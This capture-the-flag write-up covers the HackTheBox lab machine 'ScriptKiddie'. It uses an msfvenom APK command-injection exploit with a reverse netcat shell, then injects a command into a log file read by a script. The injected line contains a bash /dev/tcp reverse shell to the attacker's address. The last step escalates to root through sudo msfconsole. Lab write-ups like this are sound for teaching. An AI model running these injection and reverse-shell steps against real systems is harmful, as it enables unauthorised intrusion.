# Metadata

- IP: 10.129.95.150
- Date accessed: 05-10-2021


# Scanning

nmap scan

```
Starting Nmap 7.80 ( https://nmap.org ) at 2021-05-10 15:06 EDT
Nmap scan report for 10.129.95.150
Host is up (0.12s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
5000/tcp open  http    Werkzeug httpd 0.16.1 (Python 3.8.5)
|_http-server-header: Werkzeug/0.16.1 Python/3.8.5
|_http-title: k1d'5 h4ck3r t00l5
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 703.72 seconds


```
Ports opened
22, 5000


Logging in to $IP:5000

# Enumerating

Using CVE-2020-7384 MsfVenom APK template command injection

```
msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > show options

Module options (exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   FILENAME  msf.apk          yes       The APK file name


Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.10.14.106     yes       The listen address (an interface may be specif
                                     ied)
   LPORT  4444             yes       The listen port

   **DisablePayloadHandler: True   (no handler will be created!)**


Exploit target:

   Id  Name
   --  ----
   0   Automatic

```

LHOST is our tun0

Create a netcat listener on 4444

Upload the apk file as follows: 


![img](payload.png)


Click Generate and check y netcat listener

got a shell! 
Run `python3 -c 'import pty; pty.spawn("/bin/bash")'
` to get a stable shell 


```
root@kali-virtualbox:~/GitLab/Offensive-Security/HackTheBox/ScriptKiddie# nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.106] from (UNKNOWN) [10.129.95.150] 39088
pwd
/home/kid/html
ls
__pycache__
app.py
static
templates
whoami
kid
python3 -c 'import pty; pty.spawn("/bin/bash")'
kid@scriptkiddie:~/html$ ls
ls
__pycache__  app.py  static  templates
kid@scriptkiddie:~/html$ cd
cd
kid@scriptkiddie:~$ ls
ls
html  logs  snap  user.txt
kid@scriptkiddie:~$ cat user.txt
cat user.txt
dfbc----------------------
kid@scriptkiddie:~$ 



```
Looked around and found another user called `pwn`

```
kid@scriptkiddie:~/logs$ ls -la
ls -la
total 8
drwxrwxrwx  2 kid kid 4096 Feb  3 07:40 .
drwxr-xr-x 11 kid kid 4096 Feb  3 11:49 ..
-rw-rw-r--  1 kid pwn    0 Feb  3 11:46 hackers

```
found a `.sh` file

```
kid@scriptkiddie:/home/pwn$ ls 
ls
recon  scanlosers.sh
kid@scriptkiddie:/home/pwn$ cat scanlosers.sh
cat scanlosers.sh
#!/bin/bash

log=/home/kid/logs/hackers

cd /home/pwn/
cat $log | cut -d' ' -f3- | sort -u | while read ip; do
    sh -c "nmap --top-ports 10 -oN recon/${ip}.nmap ${ip} 2>&1 >/dev/null" &
done

if [[ $(wc -l < $log) -gt 0 ]]; then echo -n > $log; fi


```

Set up another net cat listner

```
root@kali-virtualbox:~/GitLab/Offensive-Security/HackTheBox/ScriptKiddie# nc -lvp 1337 

```


Run the bash to hopefully get another shell from `pwn`

```
kid@scriptkiddie:~/logs$ echo  "  ;/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.106/1337 0>&1' #" >>hackers

<-i >& /dev/tcp/10.10.14.106/1337 0>&1' #" >>hackers

kid@scriptkiddie:~/logs$
```

RESULTS~

```
root@kali-virtualbox:~/GitLab/Offensive-Security/HackTheBox/ScriptKiddie# nc -lvp 1337
listening on [any] 1337 ...
10.129.95.150: inverse host lookup failed: Unknown host
connect to [10.10.14.106] from (UNKNOWN) [10.129.95.150] 38866
bash: cannot set terminal process group (821): Inappropriate ioctl for device
bash: no job control in this shell
pwn@scriptkiddie:~$ 

```

I tried running the binary with pwn but nothing happens

tUrns out Pwn has sudo prv to msconsole, so we might be able to get it
```
pwn@scriptkiddie:~$ ls
ls
recon
scanlosers.sh
pwn@scriptkiddie:~$ ./scanlosers.sh
./scanlosers.sh
pwn@scriptkiddie:~$ sudo -l
sudo -l
Matching Defaults entries for pwn on scriptkiddie:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User pwn may run the following commands on scriptkiddie:
    (root) NOPASSWD: /opt/metasploit-framework-6.0.9/msfconsole
pwn@scriptkiddie:~$ 


```

Run bin bash to get shell
```
msf6 >  /bin/bash
stty: 'standard input': Inappropriate ioctl for device
[*] exec:  /bin/bash

pwd
/home/pwn
whoami
root
ls
recon
scanlosers.sh
cd
ls
root.txt
snap
cat root.txt	
cb04------------------


```